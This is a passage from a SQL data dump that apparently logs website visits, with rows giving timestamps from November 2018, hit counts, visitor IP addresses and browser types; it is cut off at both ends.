r'),(329428,1541882375,1,1,0,0,'46.229.168.148','other'),(329429,1541882479,1,1,0,0,'54.36.149.105','other'),(329430,1541882690,1,1,0,0,'95.132.54.155','chrome'),(329431,1541882932,1,1,0,0,'207.46.13.117','other'),(329432,1541883066,6,0,6,0,'176.31.226.22',''),(329433,1541883227,1,1,0,0,'66.249.66.156','chrome'),(329434,1541883262,1,1,0,0,'54.36.148.232','other'),(329435,1541883568,1,1,0,0,'54.36.148.87','other'),(329436,1541883627,1,1,0,0,'54.36.149.82','other'),(329437,1541884106,1,1,0,0,'54.36.148.38','other'),(329438,1541884223,1,1,0,0,'40.77.167.13','other'),(329439,1541884395,1,1,0,0,'66.249.66.156','chrome'),(329440,1541884593,1,1,0,0,'66.249.66.42','chrome'),(329441,1541885088,1,1,0,0,'207.46.13.190','other'),(329442,1541885093,1,1,0,0,'207.46.13.117','other'),(329443,1541885243,1,1,0,0,'54.36.148.226','other'),(329444,1541885283,1,1,0,0,'216.244.66.241','other'),(329445,1541885564,1,1,0,0,'54.36.148.214','other'),(329446,1541885811,2,2,0,0,'40.77.167.13','other'),(329447,1541885886,2,2,0,0,'37.73.109.135','firefox'),(329448,1541885941,1,1,0,0,'54.36.148.47','other'),(329449,1541886032,1,1,0,0,'54.36.148.250','other'),(329450,1541886043,1,1,0,0,'54.36.148.220','other'),(329451,1541886102,1,1,0,0,'54.36.148.77','other'),(329452,1541886246,1,1,0,0,'54.36.148.78','other'),(329453,1541886359,1,1,0,0,'54.36.148.185','other'),(329454,1541886589,1,1,0,0,'54.36.149.102','other'),(329455,1541886732,1,1,0,0,'54.36.148.25','other'),(329456,1541886745,1,1,0,0,'54.36.148.213','other'),(329457,1541886761,1,1,0,0,'66.249.66.152','chrome'),(329458,1541887050,1,1,0,0,'54.36.148.245','other'),(329459,1541887144,1,1,0,0,'46.229.168.151','other'),(329460,1541887289,1,1,0,0,'8.29.198.26','other'),(329461,1541887295,2,2,0,0,'66.249.66.155','chrome'),(329462,1541887296,1,1,0,0,'66.249.66.156','chrome'),(329463,1541887315,4,4,0,0,'216.244.66.241','other'),(329464,1541887387,1,1,0,0,'54.36.148.138','other'),(329465,1541887571,1,1,0,0,'54.36.149.11','other'),(329466,1541887661,1,1,0,0,'207.46.13.156','other'),(329467,1541887663,2,2,0,0,'66.249.66.154','chrome'),(329468,1541887776,1,0,1,0,'66.249.66.57',''),(329469,1541887777,1,0,1,0,'66.249.66.44',''),(329470,1541887960,1,1,0,0,'54.36.148.177','other'),(329471,1541887985,1,1,0,0,'66.249.66.157','chrome'),(329472,1541887986,1,1,0,0,'66.249.66.152','chrome'),(329473,1541887993,1,1,0,0,'54.36.148.214','other'),(329474,1541888007,1,1,0,0,'54.36.148.65','other'),(329475,1541888074,1,1,0,0,'54.36.149.87','other'),(329476,1541888152,1,1,0,0,'54.36.148.196','other'),(329477,1541888643,1,1,0,0,'46.229.168.139','other'),(329478,1541888645,1,1,0,0,'46.229.168.132','other'),(329479,1541888738,1,1,0,0,'54.36.148.106','other'),(329480,1541888784,1,1,0,0,'54.36.148.77','other'),(329481,1541888946,1,1,0,0,'8.29.198.26','other'),(329482,1541889048,1,1,0,0,'54.36.148.175','other'),(329483,1541889360,1,1,0,0,'66.249.66.57','chrome'),(329484,1541889362,1,1,0,0,'66.249.66.42','chrome'),(329485,1541889397,1,1,0,0,'8.29.198.27','other'),(329486,1541889648,1,1,0,0,'54.36.148.210','other'),(329487,1541889750,5,5,0,0,'216.244.66.241','other'),(329488,1541889817,1,1,0,0,'94.231.178.166','msie'),(329489,1541889928,1,1,0,0,'54.36.148.248','other'),(329490,1541889954,1,1,0,0,'178.154.244.29','other'),(329491,1541890120,1,1,0,0,'54.36.148.188','other'),(329492,1541890295,1,1,0,0,'54.36.149.27','other'),(329493,1541890347,1,1,0,0,'54.36.148.42','other'),(329494,1541890388,1,1,0,0,'54.36.148.126','other'),(329495,1541890475,1,1,0,0,'54.36.148.119','other'),(329496,1541890618,1,1,0,0,'54.36.148.138','other'),(329497,1541890689,1,1,0,0,'207.46.13.156','other'),(329498,1541890790,1,1,0,0,'54.36.148.174','other'),(329499,1541890899,1,1,0,0,'54.36.148.77','other'),(329500,1541890984,1,1,0,0,'66.249.66.152','chrome'),(329501,1541891248,1,1,0,0,'54.36.149.9','other'),(329502,1541891547,1,1,0,0,'54.36.148.115','other'),(329503,1541891666,1,1,0,0,'54.36.149.18','other'),(329504,1541891740,1,1,0,0,'54.36.148.65','other'),(329505,1541892012,1,1,0,0,'54.36.148.227','other'),(329506,1541892390,1,1,0,0,'54.36.148.13','other'),(329507,1541892493,1,1,0,0,'54.36.149.51','other'),(329508,1541892509,4,4,0,0,'66.249.66.156','chrome'),(329509,1541892589,1,1,0,0,'54.36.148.45','other'),(329510,1541892599,1,1,0,0,'46.229.168.135','other'),(329511,1541892602,1,1,0,0,'46.229.168.136','other'),(329512,1541892918,1,1,0,0,'54.36.148.179','other'),(329513,1541892973,1,1,0,0,'54.36.148.122','other'),(329514,1541893064,1,1,0,0,'207.46.13.190','other'),(329515,1541893072,1,1,0,0,'66.249.66.152','chrome'),(329516,1541893130,1,1,0,0,'54.36.148.10','other'),(329517,1541893167,1,1,0,0,'54.36.148.83','other'),(329518,1541893299,1,1,0,0,'54.36.148.233','other'),(329519,1541893402,1,1,0,0,'216.244.66.241','other'),(329520,1541893487,1,1,0,0,'66.249.66.44','chrome'),(329521,1541893628,1,1,0,0,'54.36.149.91','other'),(329522,1541893649,1,1,0,0,'54.36.148.72','other'),(329523,1541893830,1,1,0,0,'46.229.168.153','other'),(329524,1541893874,1,0,1,0,'66.249.66.155',''),(329525,1541893875,1,0,1,0,'66.249.66.156',''),(329526,1541893877,1,1,0,0,'54.36.148.188','other'),(329527,1541894122,1,1,0,0,'62.205.134.182','other'),(329528,1541894141,1,1,0,0,'54.36.148.220','other'),(329529,1541894197,1,1,0,0,'178.154.244.11','other'),(329530,1541894198,1,1,0,0,'5.45.207.79','other'),(329531,1541894250,1,1,0,0,'54.36.149.8','other'),(329532,1541894320,1,1,0,0,'54.36.148.156','other'),(329533,1541894345,1,1,0,0,'46.229.168.136','other'),(329534,1541894347,1,1,0,0,'46.229.168.132','other'),(329535,1541895099,1,1,0,0,'66.249.66.157','chrome'),(329536,1541895177,1,1,0,0,'54.36.149.38','other'),(329537,1541895356,1,1,0,0,'54.36.149.20','other'),(329538,1541895383,3,3,0,0,'216.244.66.241','other'),(329539,1541895463,1,1,0,0,'54.36.148.40','other'),(329540,1541895492,1,1,0,0,'54.36.149.48','other'),(329541,1541895750,1,1,0,0,'54.36.148.49','other'),(329542,1541895841,2,2,0,0,'178.158.234.168','chrome'),(329543,1541895916,1,1,0,0,'54.36.148.25','other'),(329544,1541896045,1,1,0,0,'13.66.139.0','other'),(329545,1541896132,1,1,0,0,'54.36.148.87','other'),(329546,1541896158,1,1,0,0,'54.36.149.32','other'),(329547,1541896296,1,1,0,0,'66.249.66.42','chrome'),(329548,1541896331,1,1,0,0,'54.36.148.118','other'),(329549,1541896356,1,1,0,0,'54.36.148.74','other'),(329550,1541896648,1,1,0,0,'66.249.66.152','chrome'),(329551,1541896688,1,1,0,0,'54.36.148.161','other'),(329552,1541896711,1,1,0,0,'66.249.66.156','chrome'),(329553,1541896789,1,1,0,0,'54.36.149.57','other'),(329554,1541896801,1,1,0,0,'46.229.168.145','other'),(329555,1541896876,1,1,0,0,'54.36.148.252','other'),(329556,1541897047,1,1,0,0,'54.36.148.93','other'),(329557,1541897332,2,2,0,0,'162.210.196.97','other'),(329558,1541897458,1,1,0,0,'54.36.149.40','other'),(329559,1541897528,1,1,0,0,'66.249.66.44','chrome'),(329560,1541897571,1,1,0,0,'66.249.66.40','chrome'),(329561,1541897754,1,1,0,0,'54.36.149.51','other'),(329562,1541897909,1,1,0,0,'54.36.148.254','other'),(329563,1541897954,1,1,0,0,'54.36.148.213','other'),(329564,1541898006,3,3,0,0,'178.154.244.11','other'),(329565,1541898088,4,4,0,0,'66.249.66.156','chrome'),(329566,1541898122,1,1,0,0,'8.29.198.25','other'),(329567,1541898210,2,2,0,0,'66.249.66.154','chrome'),(329568,1541898231,2,2,0,0,'66.249.66.152','chrome'),(329569,1541898387,11,11,0,0,'178.154.244.29','other'),(329570,1541898421,1,1,0,0,'66.249.66.157','chrome'),(329571,1541898549,1,1,0,0,'54.36.148.37','other'),(329572,1541898685,2,2,0,0,'5.45.207.19','other'),(329573,1541898746,1,1,0,0,'54.36.149.55','other'),(329574,1541898916,1,1,0,0,'54.36.148.246','other'),(329575,1541898932,2,2,0,0,'216.244.66.241','other'),(329576,1541899080,3,3,0,0,'95.108.213.4','other'),(329577,1541899089,1,1,0,0,'87.250.224.64','other'),(329578,1541899117,1,1,0,0,'37.9.113.20','other'),(329579,1541899253,1,1,0,0,'178.154.200.48','other'),(329580,1541899285,1,1,0,0,'141.8.183.23','other'),(329581,1541899348,1,1,0,0,'5.45.207.79','other'),(329582,1541899394,12,12,0,0,'178.154.244.29','other'),(329583,1541899610,2,2,0,0,'178.154.244.11','other'),(329584,1541899627,1,1,0,0,'54.36.149.2','other'),(329585,1541899644,1,1,0,0,'54.36.148.46','other'),(329586,1541899795,2,2,0,0,'8.29.198.25','other'),(329587,1541900045,1,1,0,0,'66.249.66.157','chrome'),(329588,1541900059,1,1,0,0,'87.250.224.47','other'),(329589,1541900060,1,1,0,0,'37.9.113.148','other'),(329590,1541900119,3,3,0,0,'66.249.66.156','chrome'),(329591,1541900225,3,3,0,0,'66.249.66.152','chrome'),(329592,1541900310,1,1,0,0,'178.154.244.29','other'),(329593,1541900322,1,1,0,0,'66.249.66.154','chrome'),(329594,1541900380,1,1,0,0,'46.229.168.129','other'),(329595,1541900436,1,1,0,0,'46.229.168.149','other'),(329596,1541900439,1,1,0,0,'46.229.168.146','other'),(329597,1541900694,40,40,0,0,'199.58.86.209','other'),(329598,1541900746,1,1,0,0,'54.36.148.121','other'),(329599,1541900769,1,1,0,0,'207.46.13.117','other'),(329600,1541900817,1,1,0,0,'54.36.149.26','other'),(329601,1541901033,1,1,0,0,'54.36.149.4','other'),(329602,1541901294,1,1,0,0,'178.154.244.29','other'),(329603,1541901295,1,1,0,0,'178.154.244.11','other'),(329604,1541901562,1,1,0,0,'54.36.148.119','other'),(329605,1541901638,1,1,0,0,'216.244.66.241','other'),(329606,1541901745,1,1,0,0,'66.249.66.152','chrome'),(329607,1541901841,1,1,0,0,'54.36.148.231','other'),(329608,1541901873,1,1,0,0,'54.36.149.81','other'),(329609,1541901905,6,6,0,0,'5.9.66.153','other'),(329610,1541902417,1,1,0,0,'54.36.149.54','other'),(329611,1541902418,1,1,0,0,'54.36.148.38','other'),(329612,1541902454,1,1,0,0,'54.36.148.87','other'),(329613,1541902464,1,1,0,0,'54.36.148.149','other'),(329614,1541902734,1,1,0,0,'54.36.148.58','other'),(329615,1541902763,1,1,0,0,'54.36.149.34','other'),(329616,1541902891,1,1,0,0,'54.36.148.92','other'),(329617,1541902923,1,1,0,0,'46.229.168.144','other'),(329618,1541902925,1,1,0,0,'46.229.168.135','other'),(329619,1541902941,1,1,0,0,'54.36.149.42','other'),(329620,1541902945,1,1,0,0,'54.36.149.53','other'),(329621,1541903221,2,2,0,0,'216.244.66.241','other'),(329622,1541903251,1,1,0,0,'66.249.66.154','chrome'),(329623,1541903494,1,1,0,0,'54.36.148.158','other'),(329624,1541903686,1,1,0,0,'66.249.66.44','chrome'),(329625,1541903843,2,2,0,0,'18.236.222.87','chrome'),(329626,1541903903,1,1,0,0,'54.36.148.140','other'),(329627,1541903913,2,2,0,0,'95.163.255.99','other'),(329628,1541903915,1,1,0,0,'95.163.255.98','other'),(329629,1541903919,1,1,0,0,'95.163.255.93','other'),(329630,1541904151,1,1,0,0,'54.36.149.98','other'),(329631,1541904171,1,1,0,0,'54.36.148.70','other'),(329632,1541904307,1,1,0,0,'207.46.13.117','other'),(329633,1541904309,1,1,0,0,'54.36.148.167','other'),(329634,1541904411,1,1,0,0,'46.229.168.133','other'),(329635,1541904415,1,1,0,0,'46.229.168.140','other'),(329636,1541904530,1,1,0,0,'54.36.148.54','other'),(329637,1541904641,1,1,0,0,'216.244.66.241','other'),(329638,1541904660,1,1,0,0,'54.36.148.119','other'),(329639,1541904676,1,1,0,0,'178.154.244.29','other'),(329640,1541904816,1,1,0,0,'54.36.148.215','other'),(329641,1541904878,1,1,0,0,'54.36.149.96','other'),(329642,1541904892,1,1,0,0,'54.36.148.182','other'),(329643,1541905147,1,1,0,0,'54.36.149.69','other'),(329644,1541905247,1,1,0,0,'54.36.148.128','other'),(329645,1541905269,1,1,0,0,'66.249.66.40','chrome'),(329646,1541905492,1,1,0,0,'46.229.168.142','other'),(329647,1541905495,1,1,0,0,'46.229.168.137','other'),(329648,1541906253,1,1,0,0,'46.229.168.139','other'),(329649,1541906255,2,2,0,0,'46.229.168.138','other'),(329650,1541906554,1,1,0,0,'66.249.66.154','chrome'),(329651,1541906592,1,1,0,0,'54.36.148.174','other'),(329652,1541907071,1,1,0,0,'54.36.148.162','other'),(329653,1541907073,1,1,0,0,'54.36.149.19','other'),(329654,1541907138,1,1,0,0,'54.36.148.48','other'),(329655,1541907153,1,1,0,0,'46.229.168.134','other'),(329656,1541907154,1,1,0,0,'66.249.66.152','chrome'),(329657,1541907177,2,2,0,0,'216.244.66.241','other'),(329658,1541907434,1,1,0,0,'54.36.149.89','other'),(329659,1541907929,1,1,0,0,'207.46.13.156','other'),(329660,1541908065,1,1,0,0,'54.36.149.17','other'),(329661,1541908089,1,1,0,0,'54.36.148.156','other'),(329662,1541908176,1,1,0,0,'54.36.148.41','other'),(329663,1541908179,1,1,0,0,'54.36.148.225','other'),(329664,1541908545,1,1,0,0,'54.36.148.130','other'),(329665,1541908597,1,1,0,0,'54.36.149.76','other'),(329666,1541908955,1,1,0,0,'8.29.198.26','other'),(329667,1541909302,1,1,0,0,'180.76.15.10','other'),(329668,1541909303,1,1,0,0,'180.76.15.152','other'),(329669,1541909738,58,58,0,0,'5.9.97.200','other'),(329670,1541909954,1,1,0,0,'54.36.149.64','other'),(329671,1541910211,1,1,0,0,'54.36.148.178','other'),(329672,1541910259,1,1,0,0,'207.46.13.190','other'),(329673,1541910319,1,1,0,0,'66.249.66.157','chrome'),(329674,1541910320,1,1,0,0,'66.249.66.152','chrome'),(329675,1541910570,1,1,0,0,'54.36.148.52','other'),(329676,1541910634,1,1,0,0,'66.249.66.154','chrome'),(329677,1541910638,2,2,0,0,'8.29.198.25','other'),(329678,1541910722,1,1,0,0,'46.229.168.134','other'),(329679,1541910725,1,1,0,0,'46.229.168.136','other'),(329680,1541910750,3,3,0,0,'216.244.66.241','other'),(329681,1541911062,1,1,0,0,'54.36.148.217','other'),(329682,1541911294,1,1,0,0,'207.46.13.156','other'),(329683,1541911562,1,1,0,0,'54.36.148.238','other'),(329684,1541911817,1,1,0,0,'66.249.66.154','chrome'),(329685,1541911854,1,1,0,0,'54.36.149.71','other'),(329686,1541911876,1,1,0,0,'54.36.148.230','other'),(329687,1541912034,1,1,0,0,'207.46.13.190','other'),(329688,1541912055,1,1,0,0,'66.249.66.152','chrome'),(329689,1541912095,7,7,0,0,'178.154.244.11','other'),(329690,1541912183,12,12,0,0,'178.154.244.29','other'),(329691,1541912321,1,1,0,0,'54.36.148.67','other'),(329692,1541912424,1,1,0,0,'66.249.66.156','chrome'),(329693,1541912433,2,2,0,0,'5.45.207.19','other'),(329694,1541912504,1,1,0,0,'141.8.142.103','other'),(329695,1541912815,1,1,0,0,'5.45.207.79','other'),(329696,1541912927,1,1,0,0,'46.229.168.130','other'),(329697,1541913021,1,1,0,0,'178.154.244.11','other'),(329698,1541913069,1,1,0,0,'54.164.89.55','firefox'),(329699,1541913072,1,1,0,0,'18.212.55.179','firefox'),(329700,1541913368,2,2,0,0,'178.154.244.29','other'),(329701,1541913388,1,1,0,0,'87.250.224.65','other'),(329702,1541913544,1,1,0,0,'54.36.149.82','other'),(329703,1541913596,2,2,0,0,'207.46.13.117','other'),(329704,1541913599,4,4,0,0,'216.244.66.241','other'),(329705,1541913710,1,1,0,0,'46.229.168.151','other'),(329706,1541913712,1,1,0,0,'46.229.168.137','other'),(329707,1541913728,1,1,0,0,'207.46.13.190','other'),(329708,1541913936,1,1,0,0,'54.36.148.254','other'),(329709,1541913957,1,1,0,0,'54.36.148.88','other'),(329710,1541914056,1,1,0,0,'54.36.148.237','other'),(329711,1541914077,1,1,0,0,'54.36.148.69','other'),(329712,1541914262,1,1,0,0,'178.154.244.11','other'),(329713,1541914265,1,1,0,0,'5.45.207.79','other'),(329714,1541914293,2,2,0,0,'178.154.244.29','other'),(329715,1541914376,1,1,0,0,'66.249.66.157','chrome'),(329716,1541914379,1,1,0,0,'66.249.66.154','chrome'),(329717,1541915168,1,1,0,0,'46.229.168.135','other'),(329718,1541915171,1,1,0,0,'46.229.168.139','other'),(329719,1541915206,1,1,0,0,'54.36.148.250','other'),(329720,1541915217,1,1,0,0,'178.255.215.94','other'),(329721,1541916430,1,1,0,0,'54.36.148.19','other'),(329722,1541916649,2,2,0,0,'216.244.66.241','other'),(329723,1541916889,1,1,0,0,'66.249.66.154','chrome'),(329724,1541917061,1,1,0,0,'54.36.148.61','other'),(329725,1541917483,1,1,0,0,'54.36.149.99','other'),(329726,1541917512,1,1,0,0,'54.36.148.247','other'),(329727,1541917701,1,1,0,0,'46.229.168.151','other'),(329728,1541917703,1,1,0,0,'46.229.168.136','other'),(329729,1541918100,1,1,0,0,'54.36.148.188','other'),(329730,1541918106,1,1,0,0,'54.36.149.14','other'),(329731,1541918244,1,1,0,0,'54.36.148.225','other'),(329732,1541918332,1,1,0,0,'207.46.13.156','other'),(329733,1541918536,1,1,0,0,'13.66.139.0','other'),(329734,1541918674,1,1,0,0,'54.36.148.13','other'),(329735,1541918701,1,1,0,0,'54.36.148.111','other'),(329736,1541918855,1,1,0,0,'5.188.210.52','chrome'),(329737,1541918856,1,1,0,0,'54.36.148.98','other'),(329738,1541918879,1,1,0,0,'54.36.149.77','other'),(329739,1541918889,1,1,0,0,'46.229.168.149','other'),(329740,1541918905,1,1,0,0,'54.36.148.48','other'),(329741,1541918994,1,1,0,0,'54.36.149.67','other'),(329742,1541919404,1,1,0,0,'46.229.168.129','other'),(329743,1541919614,1,1,0,0,'54.36.148.47','other'),(329744,1541919793,1,1,0,0,'54.36.148.107','other'),(329745,1541919804,1,1,0,0,'8.29.198.26','other'),(329746,1541919854,1,1,0,0,'66.249.66.156','chrome'),(329747,1541919855,1,1,0,0,'66.249.66.154','chrome'),(329748,1541920348,2,2,0,0,'216.244.66.241','other'),(329749,1541920634,2,2,0,0,'91.209.11.236','other'),(329750,1541920712,1,1,0,0,'54.36.149.33','other'),(329751,1541920969,1,1,0,0,'66.249.66.42','chrome'),(329752,1541921400,1,1,0,0,'54.36.148.46','other'),(329753,1541921487,2,2,0,0,'8.29.198.26','other'),(329754,1541921772,1,1,0,0,'54.36.148.194','other'),(329755,1541921821,1,1,0,0,'54.36.148.122','other'),(329756,1541921824,1,1,0,0,'207.46.13.156','other'),(329757,1541921921,2,2,0,0,'216.244.66.241','other'),(329758,1541921990,3,3,0,0,'66.249.66.156','chrome'),(329759,1541921991,1,1,0,0,'66.249.66.154','chrome'),(329760,1541922198,1,1,0,0,'66.249.66.152','chrome'),(329761,1541922228,1,1,0,0,'54.36.148.251','other'),(329762,1541922380,1,1,0,0,'54.36.149.19','other'),(329763,1541922388,1,1,0,0,'54.36.148.212','other'),(329764,1541922783,1,1,0,0,'66.249.66.59','chrome'),(329765,1541922792,1,1,0,0,'66.249.66.40','chrome'),(329766,1541923325,1,1,0,0,'54.36.148.193','other'),(329767,1541923474,1,1,0,0,'54.36.149.18','other'),(329768,1541923690,1,1,0,0,'54.36.148.220','other'),(329769,1541923814,1,1,0,0,'54.36.148.250','other'),(329770,1541923816,1,1,0,0,'46.229.168.140','other'),(329771,1541923819,1,1,0,0,'46.229.168.135','other'),(329772,1541924806,1,1,0,0,'54.36.148.50','other'),(329773,1541924976,1,1,0,0,'54.36.148.232','other'),(329774,1541925215,1,1,0,0,'54.36.148.243','other'),(329775,1541925658,1,1,0,0,'54.36.148.117','other'),(329776,1541925665,1,1,0,0,'216.244.66.241','other'),(329777,1541925876,1,1,0,0,'54.36.148.186','other'),(329778,1541926022,1,1,0,0,'54.36.148.224','other'),(329779,1541926115,1,1,0,0,'54.36.148.204','other'),(329780,1541926166,1,1,0,0,'66.249.66.59','chrome'),(329781,1541926167,1,1,0,0,'66.249.66.42','chrome'),(329782,1541926224,1,1,0,0,'54.36.148.203','other'),(329783,1541926494,1,1,0,0,'54.36.149.1','other'),(329784,1541927202,1,1,0,0,'54.36.149.101','other'),(329785,1541927225,3,3,0,0,'216.244.66.241','other'),(329786,1541927302,1,1,0,0,'54.36.148.187','other'),(329787,1541927469,1,1,0,0,'46.229.168.130','other'),(329788,1541927499,1,1,0,0,'54.36.149.107','other'),(329789,1541927606,1,1,0,0,'54.36.149.53','other'),(329790,1541927700,1,1,0,0,'66.249.66.40','chrome'),(329791,1541927788,1,1,0,0,'54.36.148.127','other'),(329792,1541928094,1,1,0,0,'54.36.148.29','other'),(329793,1541928253,1,1,0,0,'54.36.148.170','other'),(329794,1541928510,1,1,0,0,'54.36.148.62','other'),(329795,1541928746,1,1,0,0,'54.36.149.27','other'),(329796,1541928864,1,1,0,0,'54.36.148.174','other'),(329797,1541929185,10,10,0,0,'5.9.140.242','other'),(329798,1541929244,1,1,0,0,'54.36.148.210','other'),(329799,1541929300,5,5,0,0,'85.10.206.20','other'),(329800,1541929302,1,1,0,0,'46.229.168.140','other'),(329801,1541929315,2,2,0,0,'91.196.178.136','firefox'),(329802,1541929371,1,1,0,0,'46.229.168.130','other'),(329803,1541930074,1,1,0,0,'66.249.66.44','chrome'),(329804,1541930124,1,1,0,0,'54.36.148.34','other'),(329805,1541930418,1,1,0,0,'176.113.170.104','chrome'),(329806,1541930425,1,1,0,0,'207.46.13.117','other'),(329807,1541930466,2,2,0,0,'66.249.66.154','chrome'),(329808,1541930532,1,1,0,0,'54.36.148.93','other'),(329809,1541930578,1,1,0,0,'54.36.148.23','other'),(329810,1541930638,1,1,0,0,'8.29.198.27','other'),(329811,1541930811,2,2,0,0,'91.196.178.136','firefox'),(329812,1541930830,1,1,0,0,'54.36.149.65','other'),(329813,1541931021,1,1,0,0,'54.36.148.164','other'),(329814,1541931023,1,1,0,0,'54.36.149.44','other'),(329815,1541931104,1,1,0,0,'66.249.66.152','chrome'),(329816,1541931261,1,1,0,0,'54.36.148.179','other'),(329817,1541931419,1,1,0,0,'46.229.168.135','other'),(329818,1541931497,1,1,0,0,'46.229.168.150','other'),(329819,1541931506,1,1,0,0,'54.36.148.225','other'),(329820,1541931572,1,1,0,0,'66.249.66.155','chrome'),(329821,1541932328,1,1,0,0,'8.29.198.27','other'),(329822,1541932631,1,1,0,0,'54.36.148.224','other'),(329823,1541932689,1,1,0,0,'46.229.168.134','other'),(329824,1541932781,1,1,0,0,'8.29.198.25','other'),(329825,1541932938,2,2,0,0,'216.244.66.241','other'),(329826,1541933270,1,1,0,0,'54.36.149.61','other'),(329827,1541934370,1,1,0,0,'66.249.66.154','chrome'),(329828,1541934565,1,1,0,0,'54.36.148.51','other'),(329829,1541934792,1,1,0,0,'54.36.149.31','other'),(329830,1541934810,1,1,0,0,'66.249.66.57','chrome'),(329831,1541934811,1,1,0,0,'66.249.66.44','chrome'),(329832,1541934856,1,1,0,0,'5.58.83.96','msie'),(329833,1541935029,1,1,0,0,'5.58.83.96','firefox'),(329834,1541935074,2,2,0,0,'216.244.66.241','other'),(329835,1541935200,1,1,0,0,'54.36.149.59','other'),(329836,1541935284,1,1,0,0,'54.36.149.49','other'),(329837,1541935511,1,1,0,0,'46.229.168.146','other'),(329838,1541935515,1,1,0,0,'46.229.168.141','other'),(329839,1541935587,1,1,0,0,'54.36.148.231','other'),(329840,1541935871,1,1,0,0,'46.229.168.149','other'),(329841,1541935941,1,1,0,0,'54.36.148.142','other'),(329842,1541936248,1,1,0,0,'66.249.66.152','chrome'),(329843,1541936546,1,1,0,0,'54.36.148.62','other'),(329844,1541936764,1,1,0,0,'54.36.148.113','other'),(329845,1541936827,1,1,0,0,'207.46.13.190','other'),(329846,1541936920,1,1,0,0,'91.196.178.76','chrome'),(329847,1541936948,1,1,0,0,'54.36.148.122','other'),(329848,1541937023,2,2,0,0,'54.36.149.67','other'),(329849,1541937034,1,1,0,0,'54.36.148.52','other'),(329850,1541937092,1,1,0,0,'54.36.149.45','other'),(329851,1541937336,5,5,0,0,'216.244.66.241','other'),(329852,1541938000,1,1,0,0,'54.36.148.49','other'),(329853,1541938386,1,1,0,0,'54.36.149.49','other'),(329854,1541938538,1,1,0,0,'54.36.148.98','other'),(329855,1541938797,1,1,0,0,'54.36.149.93','other'),(329856,1541938954,1,1,0,0,'46.229.168.143','other'),(329857,1541938956,1,1,0,0,'46.229.168.132','other'),(329858,1541939494,1,1,0,0,'178.255.215.94','other'),(329859,1541939693,1,1,0,0,'54.36.148.46','other'),(329860,1541939830,1,1,0,0,'54.36.148.33','other'),(329861,1541939948,1,1,0,0,'54.36.148.228','other'),(329862,1541940070,1,1,0,0,'66.249.66.44','chrome'),(329863,1541940188,1,1,0,0,'54.36.149.3','other'),(329864,1541940343,1,1,0,0,'89.163.131.167','other'),(329865,1541940380,1,1,0,0,'37.53.125.42','firefox'),(329866,1541940745,1,1,0,0,'54.36.149.37','other'),(329867,1541940786,1,1,0,0,'54.36.148.79','other'),(329868,1541940975,1,1,0,0,'54.36.148.11','other'),(329869,1541940984,1,1,0,0,'54.36.149.44','other'),(329870,1541940999,1,1,0,0,'66.249.66.157','chrome'),(329871,1541941000,1,1,0,0,'66.249.66.152','chrome'),(329872,1541941062,2,2,0,0,'46.211.122.48','chrome'),(329873,1541941344,1,1,0,0,'93.124.117.211','chrome'),(329874,1541941439,1,1,0,0,'5.3.154.19','msie'),(329875,1541941476,1,1,0,0,'8.29.198.26','other'),(329876,1541941541,1,1,0,0,'54.36.148.196','other'),(329877,1541941750,1,1,0,0,'54.36.149.13','other'),(329878,1541941914,2,2,0,0,'46.229.168.146','other'),(329879,1541942346,5,5,0,0,'216.244.66.241','other'),(329880,1541942411,1,1,0,0,'54.36.148.183','other'),(329881,1541942643,1,1,0,0,'54.36.148.41','other'),(329882,1541942790,1,1,0,0,'66.249.66.61','chrome'),(329884,1541942865,1,1,0,0,'54.36.149.65','other'),(329885,1541942898,1,1,0,0,'66.249.66.152','chrome'),(329886,1541942947,1,1,0,0,'54.36.149.39','other'),(329887,1541943162,1,1,0,0,'8.29.198.27','other'),(329888,1541943262,1,1,0,0,'54.36.148.30','other'),(329889,1541943347,1,1,0,0,'216.244.66.241','other'),(329890,1541943500,1,1,0,0,'54.36.149.97','other'),(329891,1541943534,1,1,0,0,'54.36.149.91','other'),(329892,1541943646,1,1,0,0,'8.29.198.25','other'),(329893,1541943748,1,1,0,0,'46.229.168.134','other'),(329894,1541943799,1,1,0,0,'54.36.148.166','other'),(329895,1541944000,1,1,0,0,'54.36.149.5','other'),(329896,1541944099,1,1,0,0,'54.36.149.0','other'),(329897,1541944391,2,2,0,0,'207.46.13.156','other'),(329898,1541944540,1,1,0,0,'54.36.148.96','other'),(329899,1541944557,1,1,0,0,'54.36.148.190','other'),(329900,1541944642,4,4,0,0,'66.249.66.156','chrome'),(329901,1541944720,1,1,0,0,'54.36.148.149','other'),(329902,1541944834,1,1,0,0,'54.36.149.89','other'),(329903,1541944910,2,2,0,0,'66.249.66.157','chrome'),(329904,1541944911,3,3,0,0,'66.249.66.152','chrome'),(329905,1541945010,1,1,0,0,'66.249.66.155','chrome'),(329906,1541945120,1,1,0,0,'54.36.149.97','other'),(329907,1541945157,1,1,0,0,'67.231.16.206','other'),(329908,1541945252,1,1,0,0,'54.36.148.76','other'),(329909,1541945567,1,1,0,0,'54.36.149.42','other'),(329910,1541945660,1,1,0,0,'54.36.149.92','other'),(329911,1541946014,5,5,0,0,'207.46.13.156','other'),(329912,1541946020,5,5,0,0,'207.46.13.117','other'),(329913,1541946028,5,5,0,0,'207.46.13.190','other'),(329914,1541946039,3,3,0,0,'157.55.39.152','other'),(329915,1541946100,1,1,0,0,'54.36.148.55','other'),(329916,1541946141,3,3,0,0,'66.249.66.154','chrome'),(329917,1541946152,1,1,0,0,'54.36.148.233','other'),(329918,1541946174,1,1,0,0,'180.76.15.149','other'),(329919,1541946410,1,1,0,0,'54.36.149.62','other'),(329920,1541946439,6,6,0,0,'66.249.66.156','chrome'),(329921,1541946463,1,1,0,0,'66.249.66.61','chrome'),(329922,1541946465,1,1,0,0,'66.249.66.40','chrome'),(329923,1541946471,6,6,0,0,'66.249.66.155','chrome'),(329925,1541946582,1,1,0,0,'54.36.148.171','other'),(329926,1541946624,1,1,0,0,'66.249.66.157','chrome'),(329927,1541946760,4,4,0,0,'66.249.66.152','chrome'),(329928,1541946784,1,1,0,0,'5.188.210.52','chrome'),(329929,1541946910,1,1,0,0,'46.229.168.136','other'),(329930,1541946912,1,1,0,0,'46.229.168.141','other'),(329931,1541946994,1,1,0,0,'46.229.168.147','other'),(329932,1541947380,1,1,0,0,'54.36.148.250','other'),(329933,1541947602,1,1,0,0,'54.36.148.57','other'),(329934,1541947638,5,5,0,0,'216.244.66.241','other'),(329935,1541947807,2,2,0,0,'178.94.92.53','opera'),(329936,1541947896,1,1,0,0,'54.36.148.189','other'),(329937,1541948186,1,1,0,0,'54.36.149.4','other'),(329938,1541948289,1,1,0,0,'54.36.148.48','other'),(329939,1541948663,1,1,0,0,'54.36.149.19','other'),(329940,1541949339,1,1,0,0,'